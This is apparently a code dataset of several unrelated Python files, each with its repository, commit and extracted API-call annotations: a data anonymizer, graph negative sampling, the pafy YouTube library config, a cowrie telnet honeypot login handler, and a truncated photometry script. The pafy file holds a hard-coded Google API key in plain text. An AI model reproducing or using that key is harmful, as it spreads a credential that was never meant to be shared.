print(item.weight, item.sentence) | [((293, 311), 'textrank4zh.TextRank4Keyword', 'TextRank4Keyword', ([], {}), '()\n', (309, 311), False, 'from textrank4zh import TextRank4Keyword, TextRank4Sentence\n'), ((647, 666), 'textrank4zh.TextRank4Sentence', 'TextRank4Sentence', ([], {}), '()\n', (664, 666), False, 'from textrank4zh import TextRank4Keyword, TextRank4Sentence\n'), ((99, 130), 'sys.setdefaultencoding', 'sys.setdefaultencoding', (['"""utf-8"""'], {}), "('utf-8')\n", (121, 130), False, 'import sys\n'), ((231, 278), 'codecs.open', 'codecs.open', (['"""../test/doc/01.txt"""', '"""r"""', '"""utf-8"""'], {}), "('../test/doc/01.txt', 'r', 'utf-8')\n", (242, 278), False, 'import codecs\n')] |
suutari-ai/respa | scripts/anonymize_dumpdata.py | a944b1c13f855eaf5f883687b5fd025ece7c8176 | import random
import uuid
import sys
import json
from faker import Factory
from faker.providers.person.fi_FI import Provider as PersonProvider
fake = Factory.create('fi_FI')
email_by_user = {}
users_by_id = {}
def anonymize_users(users):
usernames = set()
emails = set()
for data in users:
if data['model'] != 'users.user':
continue
user = data['fields']
user['password'] = "!"
username = fake.user_name()
while username in usernames:
username = fake.user_name()
usernames.add(username)
user['username'] = username
user['uuid'] = str(uuid.uuid4())
if user['first_name']:
user['first_name'] = fake.first_name()
if user['last_name']:
user['last_name'] = fake.last_name()
user['email'] = fake.email()
email_by_user[data['pk']] = user['email']
users_by_id[data['pk']] = user
def remove_secrets(data):
for model in data:
fields = model['fields']
if model['model'] == 'socialaccount.socialapp':
fields['client_id'] = fake.md5()
fields['secret'] = fake.md5()
        elif model['model'] == 'socialaccount.socialtoken':
fields['token_secret'] = fake.md5()
fields['token'] = fake.md5()
elif model['model'] == 'account.emailaddress':
fields['email'] = email_by_user[fields['user']]
elif model['model'] == 'socialaccount.socialaccount':
fields['extra_data'] = '{}'
fields['uid'] = users_by_id[fields['user']]['uuid']
elif model['model'] == 'sessions.session':
fields['session_data'] = "!"
model['pk'] = fake.md5()
data = json.load(sys.stdin)
anonymize_users(data)
remove_secrets(data)
json.dump(data, sys.stdout, indent=4)
| [((151, 174), 'faker.Factory.create', 'Factory.create', (['"""fi_FI"""'], {}), "('fi_FI')\n", (165, 174), False, 'from faker import Factory\n'), ((1731, 1751), 'json.load', 'json.load', (['sys.stdin'], {}), '(sys.stdin)\n', (1740, 1751), False, 'import json\n'), ((1795, 1832), 'json.dump', 'json.dump', (['data', 'sys.stdout'], {'indent': '(4)'}), '(data, sys.stdout, indent=4)\n', (1804, 1832), False, 'import json\n'), ((639, 651), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (649, 651), False, 'import uuid\n')] |
NucciTheBoss/pytorch_geometric | torch_geometric/utils/negative_sampling.py | e220a2c08fa1b2f1672d616c22eac2a67b5c8967 | import random
from typing import Optional, Tuple, Union
import numpy as np
import torch
from torch import Tensor
from torch_geometric.utils import coalesce, degree, remove_self_loops
from .num_nodes import maybe_num_nodes
def negative_sampling(edge_index: Tensor,
num_nodes: Optional[Union[int, Tuple[int, int]]] = None,
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False) -> Tensor:
r"""Samples random negative edges of a graph given by :attr:`edge_index`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int or Tuple[int, int], optional): The number of nodes,
*i.e.* :obj:`max_val + 1` of :attr:`edge_index`.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph with shape :obj:`(num_src_nodes, num_dst_nodes)`.
(default: :obj:`None`)
num_neg_samples (int, optional): The (approximate) number of negative
samples to return.
If set to :obj:`None`, will try to return a negative edge for every
positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
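    Example (illustrative; the sampled edges are random):
        >>> edge_index = torch.as_tensor([[0, 0, 1, 2],
        ...                               [1, 2, 2, 3]])
        >>> # One random negative per positive edge:
        >>> neg_edge_index = negative_sampling(edge_index, num_nodes=4)
        >>> # A fixed number of undirected negative edges:
        >>> neg_edge_index = negative_sampling(edge_index, num_nodes=4,
        ...                                    num_neg_samples=3,
        ...                                    force_undirected=True)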
"""
assert method in ['sparse', 'dense']
size = num_nodes
bipartite = isinstance(size, (tuple, list))
size = maybe_num_nodes(edge_index) if size is None else size
size = (size, size) if not bipartite else size
force_undirected = False if bipartite else force_undirected
idx, population = edge_index_to_vector(edge_index, size, bipartite,
force_undirected)
if idx.numel() >= population:
return edge_index.new_empty((2, 0))
if num_neg_samples is None:
num_neg_samples = edge_index.size(1)
if force_undirected:
num_neg_samples = num_neg_samples // 2
prob = 1. - idx.numel() / population # Probability to sample a negative.
sample_size = int(1.1 * num_neg_samples / prob) # (Over)-sample size.
neg_idx = None
if method == 'dense':
# The dense version creates a mask of shape `population` to check for
# invalid samples.
mask = idx.new_ones(population, dtype=torch.bool)
mask[idx] = False
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, idx.device)
rnd = rnd[mask[rnd]] # Filter true negatives.
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
mask[neg_idx] = False
else: # 'sparse'
# The sparse version checks for invalid samples via `np.isin`.
idx = idx.to('cpu')
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, device='cpu')
mask = np.isin(rnd, idx)
if neg_idx is not None:
mask |= np.isin(rnd, neg_idx.to('cpu'))
mask = torch.from_numpy(mask).to(torch.bool)
rnd = rnd[~mask].to(edge_index.device)
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
return vector_to_edge_index(neg_idx, size, bipartite, force_undirected)
def batched_negative_sampling(
edge_index: Tensor,
batch: Union[Tensor, Tuple[Tensor, Tensor]],
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False,
) -> Tensor:
r"""Samples random negative edges of multiple graphs given by
:attr:`edge_index` and :attr:`batch`.
Args:
edge_index (LongTensor): The edge indices.
batch (LongTensor or Tuple[LongTensor, LongTensor]): Batch vector
:math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^N`, which assigns each
node to a specific example.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph connecting two different node types.
num_neg_samples (int, optional): The number of negative samples to
return. If set to :obj:`None`, will try to return a negative edge
for every positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
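    Example (illustrative; the sampled edges are random):
        >>> # Two disjoint three-node graphs packed into one batch.
        >>> edge_index = torch.as_tensor([[0, 1, 3, 4],
        ...                               [1, 2, 4, 5]])
        >>> batch = torch.as_tensor([0, 0, 0, 1, 1, 1])
        >>> neg_edge_index = batched_negative_sampling(edge_index, batch)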
"""
if isinstance(batch, Tensor):
src_batch, dst_batch = batch, batch
else:
src_batch, dst_batch = batch[0], batch[1]
split = degree(src_batch[edge_index[0]], dtype=torch.long).tolist()
edge_indices = torch.split(edge_index, split, dim=1)
num_src = degree(src_batch, dtype=torch.long)
cum_src = torch.cat([src_batch.new_zeros(1), num_src.cumsum(0)[:-1]])
if isinstance(batch, Tensor):
num_nodes = num_src.tolist()
cumsum = cum_src
else:
num_dst = degree(dst_batch, dtype=torch.long)
cum_dst = torch.cat([dst_batch.new_zeros(1), num_dst.cumsum(0)[:-1]])
num_nodes = torch.stack([num_src, num_dst], dim=1).tolist()
cumsum = torch.stack([cum_src, cum_dst], dim=1).unsqueeze(-1)
neg_edge_indices = []
for i, edge_index in enumerate(edge_indices):
edge_index = edge_index - cumsum[i]
neg_edge_index = negative_sampling(edge_index, num_nodes[i],
num_neg_samples, method,
force_undirected)
neg_edge_index += cumsum[i]
neg_edge_indices.append(neg_edge_index)
return torch.cat(neg_edge_indices, dim=1)
def structured_negative_sampling(edge_index, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True):
r"""Samples a negative edge :obj:`(i,k)` for every positive edge
:obj:`(i,j)` in the graph given by :attr:`edge_index`, and returns it as a
tuple of the form :obj:`(i,j,k)`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: (LongTensor, LongTensor, LongTensor)
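    Example (illustrative; the returned :obj:`k` indices are random):
        >>> edge_index = torch.as_tensor([[0, 0, 1, 2],
        ...                               [1, 2, 3, 3]])
        >>> i, j, k = structured_negative_sampling(edge_index)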
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
row, col = edge_index.cpu()
pos_idx = row * num_nodes + col
if not contains_neg_self_loops:
loop_idx = torch.arange(num_nodes) * (num_nodes + 1)
pos_idx = torch.cat([pos_idx, loop_idx], dim=0)
rand = torch.randint(num_nodes, (row.size(0), ), dtype=torch.long)
neg_idx = row * num_nodes + rand
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = mask.nonzero(as_tuple=False).view(-1)
while rest.numel() > 0: # pragma: no cover
tmp = torch.randint(num_nodes, (rest.size(0), ), dtype=torch.long)
rand[rest] = tmp
neg_idx = row[rest] * num_nodes + tmp
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = rest[mask]
return edge_index[0], edge_index[1], rand.to(edge_index.device)
def structured_negative_sampling_feasible(
edge_index: Tensor, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True) -> bool:
r"""Returns :obj:`True` if
:meth:`~torch_geometric.utils.structured_negative_sampling` is feasible
on the graph given by :obj:`edge_index`.
:obj:`~torch_geometric.utils.structured_negative_sampling` is infeasible
    if at least one node is connected to all other nodes.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: bool
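    Example:
        >>> # Illustrative: in a triangle every node is connected to all
        >>> # other nodes, so sampling without self-loops is infeasible.
        >>> edge_index = torch.as_tensor([[0, 0, 1, 1, 2, 2],
        ...                               [1, 2, 0, 2, 0, 1]])
        >>> structured_negative_sampling_feasible(edge_index, 3, False)
        False
        >>> structured_negative_sampling_feasible(edge_index, 3, True)
        True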
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
max_num_neighbors = num_nodes
edge_index = coalesce(edge_index, num_nodes=num_nodes)
if not contains_neg_self_loops:
edge_index, _ = remove_self_loops(edge_index)
max_num_neighbors -= 1 # Reduce number of valid neighbors
deg = degree(edge_index[0], num_nodes)
# True if there exists no node that is connected to all other nodes.
return bool(torch.all(deg < max_num_neighbors))
###############################################################################
def sample(population: int, k: int, device=None) -> Tensor:
if population <= k:
return torch.arange(population, device=device)
else:
return torch.tensor(random.sample(range(population), k), device=device)
def edge_index_to_vector(
edge_index: Tensor,
size: Tuple[int, int],
bipartite: bool,
force_undirected: bool = False,
) -> Tuple[Tensor, int]:
row, col = edge_index
if bipartite: # No need to account for self-loops.
idx = (row * size[1]).add_(col)
population = size[0] * size[1]
return idx, population
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
# We only operate on the upper triangular matrix:
mask = row < col
row, col = row[mask], col[mask]
offset = torch.arange(1, num_nodes, device=row.device).cumsum(0)[row]
idx = row.mul_(num_nodes).add_(col).sub_(offset)
population = (num_nodes * (num_nodes + 1)) // 2 - num_nodes
return idx, population
else:
assert size[0] == size[1]
num_nodes = size[0]
# We remove self-loops as we do not want to take them into account
# when sampling negative values.
mask = row != col
row, col = row[mask], col[mask]
col[row < col] -= 1
idx = row.mul_(num_nodes - 1).add_(col)
population = num_nodes * num_nodes - num_nodes
return idx, population
def vector_to_edge_index(idx: Tensor, size: Tuple[int, int], bipartite: bool,
force_undirected: bool = False) -> Tensor:
if bipartite: # No need to account for self-loops.
row = idx.div(size[1], rounding_mode='floor')
col = idx % size[1]
return torch.stack([row, col], dim=0)
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
offset = torch.arange(1, num_nodes, device=idx.device).cumsum(0)
end = torch.arange(num_nodes, num_nodes * num_nodes, num_nodes,
device=idx.device)
row = torch.bucketize(idx, end.sub_(offset), right=True)
col = offset[row].add_(idx) % num_nodes
return torch.stack([torch.cat([row, col]), torch.cat([col, row])], 0)
else:
assert size[0] == size[1]
num_nodes = size[0]
row = idx.div(num_nodes - 1, rounding_mode='floor')
col = idx % (num_nodes - 1)
col[row <= col] += 1
return torch.stack([row, col], dim=0)
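# --- Editor's note: illustrative sketch, not part of the original module. ---
# `vector_to_edge_index` inverts the packing above, so drawing integers from
# `range(population)` and decoding them yields candidate (row, col) pairs:
def _vector_roundtrip_sketch():
    edge_index = torch.tensor([[0, 2, 1], [2, 0, 2]])
    idx, _ = edge_index_to_vector(edge_index, (3, 3), bipartite=False)
    # Decoding recovers the original pairs: tensor([[0, 2, 1], [2, 0, 2]])
    return vector_to_edge_index(idx, (3, 3), bipartite=False)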
| [((5711, 5748), 'torch.split', 'torch.split', (['edge_index', 'split'], {'dim': '(1)'}), '(edge_index, split, dim=1)\n', (5722, 5748), False, 'import torch\n'), ((5764, 5799), 'torch_geometric.utils.degree', 'degree', (['src_batch'], {'dtype': 'torch.long'}), '(src_batch, dtype=torch.long)\n', (5770, 5799), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((6667, 6701), 'torch.cat', 'torch.cat', (['neg_edge_indices'], {'dim': '(1)'}), '(neg_edge_indices, dim=1)\n', (6676, 6701), False, 'import torch\n'), ((9298, 9339), 'torch_geometric.utils.coalesce', 'coalesce', (['edge_index'], {'num_nodes': 'num_nodes'}), '(edge_index, num_nodes=num_nodes)\n', (9306, 9339), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((9509, 9541), 'torch_geometric.utils.degree', 'degree', (['edge_index[0]', 'num_nodes'], {}), '(edge_index[0], num_nodes)\n', (9515, 9541), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((5999, 6034), 'torch_geometric.utils.degree', 'degree', (['dst_batch'], {'dtype': 'torch.long'}), '(dst_batch, dtype=torch.long)\n', (6005, 6034), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((7712, 7749), 'torch.cat', 'torch.cat', (['[pos_idx, loop_idx]'], {'dim': '(0)'}), '([pos_idx, loop_idx], dim=0)\n', (7721, 7749), False, 'import torch\n'), ((9401, 9430), 'torch_geometric.utils.remove_self_loops', 'remove_self_loops', (['edge_index'], {}), '(edge_index)\n', (9418, 9430), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((9631, 9665), 'torch.all', 'torch.all', (['(deg < max_num_neighbors)'], {}), '(deg < max_num_neighbors)\n', (9640, 9665), False, 'import torch\n'), ((9850, 9889), 'torch.arange', 'torch.arange', (['population'], {'device': 'device'}), '(population, device=device)\n', (9862, 9889), False, 'import torch\n'), ((11503, 11533), 'torch.stack', 'torch.stack', (['[row, col]'], {'dim': '(0)'}), '([row, col], dim=0)\n', (11514, 11533), False, 'import torch\n'), ((3509, 3526), 'numpy.isin', 'np.isin', (['rnd', 'idx'], {}), '(rnd, idx)\n', (3516, 3526), True, 'import numpy as np\n'), ((5632, 5682), 'torch_geometric.utils.degree', 'degree', (['src_batch[edge_index[0]]'], {'dtype': 'torch.long'}), '(src_batch[edge_index[0]], dtype=torch.long)\n', (5638, 5682), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((7652, 7675), 'torch.arange', 'torch.arange', (['num_nodes'], {}), '(num_nodes)\n', (7664, 7675), False, 'import torch\n'), ((11712, 11788), 'torch.arange', 'torch.arange', (['num_nodes', '(num_nodes * num_nodes)', 'num_nodes'], {'device': 'idx.device'}), '(num_nodes, num_nodes * num_nodes, num_nodes, device=idx.device)\n', (11724, 11788), False, 'import torch\n'), ((12221, 12251), 'torch.stack', 'torch.stack', (['[row, col]'], {'dim': '(0)'}), '([row, col], dim=0)\n', (12232, 12251), False, 'import torch\n'), ((3045, 3070), 'torch.cat', 'torch.cat', (['[neg_idx, rnd]'], {}), '([neg_idx, rnd])\n', (3054, 3070), False, 'import torch\n'), ((3777, 3802), 'torch.cat', 'torch.cat', (['[neg_idx, rnd]'], {}), '([neg_idx, rnd])\n', (3786, 3802), False, 'import torch\n'), ((6134, 6172), 'torch.stack', 'torch.stack', (['[num_src, num_dst]'], {'dim': '(1)'}), '([num_src, num_dst], dim=1)\n', (6145, 6172), False, 'import torch\n'), ((6199, 6237), 'torch.stack', 'torch.stack', (['[cum_src, cum_dst]'], {'dim': '(1)'}), '([cum_src, cum_dst], dim=1)\n', (6210, 6237), False, 'import torch\n'), 
((7888, 7913), 'numpy.isin', 'np.isin', (['neg_idx', 'pos_idx'], {}), '(neg_idx, pos_idx)\n', (7895, 7913), True, 'import numpy as np\n'), ((3638, 3660), 'torch.from_numpy', 'torch.from_numpy', (['mask'], {}), '(mask)\n', (3654, 3660), False, 'import torch\n'), ((8206, 8231), 'numpy.isin', 'np.isin', (['neg_idx', 'pos_idx'], {}), '(neg_idx, pos_idx)\n', (8213, 8231), True, 'import numpy as np\n'), ((11642, 11687), 'torch.arange', 'torch.arange', (['(1)', 'num_nodes'], {'device': 'idx.device'}), '(1, num_nodes, device=idx.device)\n', (11654, 11687), False, 'import torch\n'), ((11957, 11978), 'torch.cat', 'torch.cat', (['[row, col]'], {}), '([row, col])\n', (11966, 11978), False, 'import torch\n'), ((11980, 12001), 'torch.cat', 'torch.cat', (['[col, row]'], {}), '([col, row])\n', (11989, 12001), False, 'import torch\n'), ((10566, 10611), 'torch.arange', 'torch.arange', (['(1)', 'num_nodes'], {'device': 'row.device'}), '(1, num_nodes, device=row.device)\n', (10578, 10611), False, 'import torch\n')] |
DavidJohnKelly/YoutubeDownloader | venv/Lib/site-packages/pafy/g.py | 29cb4aa90946803474959f60d7b7e2f07c6e4de2 | import sys
if sys.version_info[:2] >= (3, 0):
# pylint: disable=E0611,F0401,I0011
from urllib.request import build_opener
else:
from urllib2 import build_opener
from . import __version__
urls = {
'gdata': "https://www.googleapis.com/youtube/v3/",
'watchv': "http://www.youtube.com/watch?v=%s",
'playlist': ('http://www.youtube.com/list_ajax?'
'style=json&action_get_list=1&list=%s'),
'thumb': "http://i.ytimg.com/vi/%s/default.jpg",
'bigthumb': "http://i.ytimg.com/vi/%s/mqdefault.jpg",
'bigthumbhd': "http://i.ytimg.com/vi/%s/hqdefault.jpg",
# For internal backend
'vidinfo': ('https://www.youtube.com/get_video_info?video_id=%s&'
'eurl=https://youtube.googleapis.com/v/%s&sts=%s'),
'embed': "https://youtube.com/embed/%s"
}
api_key = "AIzaSyCIM4EzNqi1in22f4Z3Ru3iYvLaY8tc3bo"
user_agent = "pafy " + __version__
lifespan = 60 * 60 * 5 # 5 hours
opener = build_opener()
opener.addheaders = [('User-Agent', user_agent)]
cache = {}
def_ydl_opts = {'quiet': True, 'prefer_insecure': False, 'no_warnings': True}
# The following are specific to the internal backend
UEFSM = 'url_encoded_fmt_stream_map'
AF = 'adaptive_fmts'
jsplayer = r';ytplayer\.config\s*=\s*({.*?});'
itags = {
'5': ('320x240', 'flv', "normal", ''),
'17': ('176x144', '3gp', "normal", ''),
'18': ('640x360', 'mp4', "normal", ''),
'22': ('1280x720', 'mp4', "normal", ''),
'34': ('640x360', 'flv', "normal", ''),
'35': ('854x480', 'flv', "normal", ''),
'36': ('320x240', '3gp', "normal", ''),
'37': ('1920x1080', 'mp4', "normal", ''),
'38': ('4096x3072', 'mp4', "normal", '4:3 hi-res'),
'43': ('640x360', 'webm', "normal", ''),
'44': ('854x480', 'webm', "normal", ''),
'45': ('1280x720', 'webm', "normal", ''),
'46': ('1920x1080', 'webm', "normal", ''),
'82': ('640x360-3D', 'mp4', "normal", ''),
'83': ('640x480-3D', 'mp4', 'normal', ''),
'84': ('1280x720-3D', 'mp4', "normal", ''),
'100': ('640x360-3D', 'webm', "normal", ''),
'102': ('1280x720-3D', 'webm', "normal", ''),
'133': ('426x240', 'm4v', 'video', ''),
'134': ('640x360', 'm4v', 'video', ''),
'135': ('854x480', 'm4v', 'video', ''),
'136': ('1280x720', 'm4v', 'video', ''),
'137': ('1920x1080', 'm4v', 'video', ''),
'138': ('4096x3072', 'm4v', 'video', ''),
'139': ('48k', 'm4a', 'audio', ''),
'140': ('128k', 'm4a', 'audio', ''),
'141': ('256k', 'm4a', 'audio', ''),
'160': ('256x144', 'm4v', 'video', ''),
'167': ('640x480', 'webm', 'video', ''),
'168': ('854x480', 'webm', 'video', ''),
'169': ('1280x720', 'webm', 'video', ''),
'170': ('1920x1080', 'webm', 'video', ''),
'171': ('128k', 'ogg', 'audio', ''),
'172': ('192k', 'ogg', 'audio', ''),
'218': ('854x480', 'webm', 'video', 'VP8'),
'219': ('854x480', 'webm', 'video', 'VP8'),
'242': ('360x240', 'webm', 'video', 'VP9'),
'243': ('480x360', 'webm', 'video', 'VP9'),
'244': ('640x480', 'webm', 'video', 'VP9 low'),
'245': ('640x480', 'webm', 'video', 'VP9 med'),
'246': ('640x480', 'webm', 'video', 'VP9 high'),
'247': ('720x480', 'webm', 'video', 'VP9'),
'248': ('1920x1080', 'webm', 'video', 'VP9'),
'249': ('48k', 'opus', 'audio', 'Opus'),
'250': ('56k', 'opus', 'audio', 'Opus'),
'251': ('128k', 'opus', 'audio', 'Opus'),
'256': ('192k', 'm4a', 'audio', '6-channel'),
'258': ('320k', 'm4a', 'audio', '6-channel'),
'264': ('2560x1440', 'm4v', 'video', ''),
'266': ('3840x2160', 'm4v', 'video', 'AVC'),
'271': ('1920x1280', 'webm', 'video', 'VP9'),
'272': ('3414x1080', 'webm', 'video', 'VP9'),
'278': ('256x144', 'webm', 'video', 'VP9'),
'298': ('1280x720', 'm4v', 'video', '60fps'),
'299': ('1920x1080', 'm4v', 'video', '60fps'),
'302': ('1280x720', 'webm', 'video', 'VP9'),
'303': ('1920x1080', 'webm', 'video', 'VP9'),
}
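# --- Editor's note: illustrative sketch, not part of the original module. ---
# The tables above are plain lookup data: `urls` holds printf-style templates
# keyed by purpose, and `itags` maps a YouTube itag code to a tuple of
# (resolution or bitrate, container, media type, note).  The video id below is
# only an example value:
def _lookup_sketch(video_id="dQw4w9WgXcQ", itag="22"):
    watch_url = urls['watchv'] % video_id   # http://www.youtube.com/watch?v=<video_id>
    quality, ext, kind, note = itags[itag]   # ('1280x720', 'mp4', 'normal', '')
    return watch_url, quality, ext, kind, note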
| [((940, 954), 'urllib2.build_opener', 'build_opener', ([], {}), '()\n', (952, 954), False, 'from urllib2 import build_opener\n')] |
uwacyber/cowrie | src/cowrie/telnet/userauth.py | 1d81e1ca5d0b8461e06f17aee26cb7bf108a16e5 | # Copyright (C) 2015, 2016 GoSecure Inc.
"""
Telnet Transport and Authentication for the Honeypot
@author: Olivier Bilodeau <[email protected]>
"""
from __future__ import annotations
import struct
from twisted.conch.telnet import (
ECHO,
LINEMODE,
NAWS,
SGA,
AuthenticatingTelnetProtocol,
ITelnetProtocol,
)
from twisted.python import log
from cowrie.core.config import CowrieConfig
from cowrie.core.credentials import UsernamePasswordIP
class HoneyPotTelnetAuthProtocol(AuthenticatingTelnetProtocol):
"""
TelnetAuthProtocol that takes care of Authentication. Once authenticated this
protocol is replaced with HoneyPotTelnetSession.
"""
loginPrompt = b"login: "
passwordPrompt = b"Password: "
windowSize = [40, 80]
def connectionMade(self):
# self.transport.negotiationMap[NAWS] = self.telnet_NAWS
        # Initial option negotiation. Want something at least for Mirai
# for opt in (NAWS,):
# self.transport.doChain(opt).addErrback(log.err)
# I need to doubly escape here since my underlying
# CowrieTelnetTransport hack would remove it and leave just \n
self.transport.write(self.factory.banner.replace(b"\n", b"\r\r\n"))
self.transport.write(self.loginPrompt)
def connectionLost(self, reason):
"""
Fires on pre-authentication disconnects
"""
AuthenticatingTelnetProtocol.connectionLost(self, reason)
def telnet_User(self, line):
"""
Overridden to conditionally kill 'WILL ECHO' which confuses clients
that don't implement a proper Telnet protocol (most malware)
"""
self.username = line # .decode()
# only send ECHO option if we are chatting with a real Telnet client
self.transport.willChain(ECHO)
# FIXME: this should be configurable or provided via filesystem
self.transport.write(self.passwordPrompt)
return "Password"
def telnet_Password(self, line):
username, password = self.username, line # .decode()
del self.username
def login(ignored):
self.src_ip = self.transport.getPeer().host
creds = UsernamePasswordIP(username, password, self.src_ip)
d = self.portal.login(creds, self.src_ip, ITelnetProtocol)
d.addCallback(self._cbLogin)
d.addErrback(self._ebLogin)
# are we dealing with a real Telnet client?
if self.transport.options:
# stop ECHO
# even if ECHO negotiation fails we still want to attempt a login
# this allows us to support dumb clients which is common in malware
# thus the addBoth: on success and on exception (AlreadyNegotiating)
self.transport.wontChain(ECHO).addBoth(login)
else:
# process login
login("")
return "Discard"
def telnet_Command(self, command):
self.transport.protocol.dataReceived(command + b"\r")
return "Command"
def _cbLogin(self, ial):
"""
Fired on a successful login
"""
interface, protocol, logout = ial
protocol.windowSize = self.windowSize
self.protocol = protocol
self.logout = logout
self.state = "Command"
self.transport.write(b"\n")
# Remove the short timeout of the login prompt.
self.transport.setTimeout(
CowrieConfig.getint("honeypot", "interactive_timeout", fallback=300)
)
# replace myself with avatar protocol
protocol.makeConnection(self.transport)
self.transport.protocol = protocol
def _ebLogin(self, failure):
# TODO: provide a way to have user configurable strings for wrong password
self.transport.wontChain(ECHO)
self.transport.write(b"\nLogin incorrect\n")
self.transport.write(self.loginPrompt)
self.state = "User"
def telnet_NAWS(self, data):
"""
From TelnetBootstrapProtocol in twisted/conch/telnet.py
"""
if len(data) == 4:
width, height = struct.unpack("!HH", b"".join(data))
self.windowSize = [height, width]
else:
log.msg("Wrong number of NAWS bytes")
def enableLocal(self, opt):
if opt == ECHO:
return True
# TODO: check if twisted now supports SGA (see git commit c58056b0)
elif opt == SGA:
return False
else:
return False
def enableRemote(self, opt):
# TODO: check if twisted now supports LINEMODE (see git commit c58056b0)
if opt == LINEMODE:
return False
elif opt == NAWS:
return True
elif opt == SGA:
return True
else:
return False
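# --- Editor's note: illustrative sketch, not part of the original file. ------
# telnet_NAWS above decodes the NAWS subnegotiation payload: two big-endian
# unsigned shorts carrying the client's terminal width and height, stored as
# [height, width]:
def _naws_decode_sketch():
    width, height = struct.unpack("!HH", b"\x00\x50\x00\x18")  # an 80x24 client
    return [height, width]  # [24, 80]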
| [((1410, 1467), 'twisted.conch.telnet.AuthenticatingTelnetProtocol.connectionLost', 'AuthenticatingTelnetProtocol.connectionLost', (['self', 'reason'], {}), '(self, reason)\n', (1453, 1467), False, 'from twisted.conch.telnet import ECHO, LINEMODE, NAWS, SGA, AuthenticatingTelnetProtocol, ITelnetProtocol\n'), ((2208, 2259), 'cowrie.core.credentials.UsernamePasswordIP', 'UsernamePasswordIP', (['username', 'password', 'self.src_ip'], {}), '(username, password, self.src_ip)\n', (2226, 2259), False, 'from cowrie.core.credentials import UsernamePasswordIP\n'), ((3450, 3518), 'cowrie.core.config.CowrieConfig.getint', 'CowrieConfig.getint', (['"""honeypot"""', '"""interactive_timeout"""'], {'fallback': '(300)'}), "('honeypot', 'interactive_timeout', fallback=300)\n", (3469, 3518), False, 'from cowrie.core.config import CowrieConfig\n'), ((4237, 4274), 'twisted.python.log.msg', 'log.msg', (['"""Wrong number of NAWS bytes"""'], {}), "('Wrong number of NAWS bytes')\n", (4244, 4274), False, 'from twisted.python import log\n')] |
flyr4nk/secscan-authcheck | authcheck/app/model/exception.py | d04c6ae3dc1fa7841727d23161c27eebaf92be3c | class WebException(Exception):
pass
class ParserException(Exception):
"""
    Parsing exception
"""
pass
class ApiException(Exception):
"""
    API exception
"""
pass
class WsException(Exception):
"""
    Polling exception
"""
pass
class SsoException(Exception):
"""
    SSO exception
"""
pass
class LibException(Exception):
"""
    Lib exception
"""
pass
class AccountException(Exception):
"""
    Account exception (the account is no longer valid)
"""
pass
class FlowException(Exception):
"""
    Authentication traffic exception
"""
pass
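# --- Editor's note: illustrative sketch, not part of the original file. ------
# These classes only tag failure domains so callers can catch them by
# category; `_poll_once` below is a hypothetical helper, not part of authcheck:
def _poll_once(session_alive):
    if not session_alive:
        raise WsException("polling session is no longer alive")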
| [] |
JeremyBuchanan/psf-photometry-pipeline | p_io.py | 864818dc8dd946a6e4d8dde1667bf948b769bb39 | import astropy.io.fits as fits
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import obj_data as od
import saphires as saph
from astropy.time import Time
from astropy.visualization import ZScaleInterval, SqrtStretch, ImageNormalize, simple_norm
from matplotlib.backends.backend_pdf import PdfPages
ra = od.ra
dec = od.dec
pmra = od.pmra
pmdec = od.pmdec
plx = od.plx
epoch = od.epoch
matplotlib.rcParams.update({'font.size': 12})
def write_fits(fn, data, im_headers, wcs_header):
'''
    Writes a new fits file including the image data and
    an updated header for the new image
    Parameters
    ----------
    fn: string
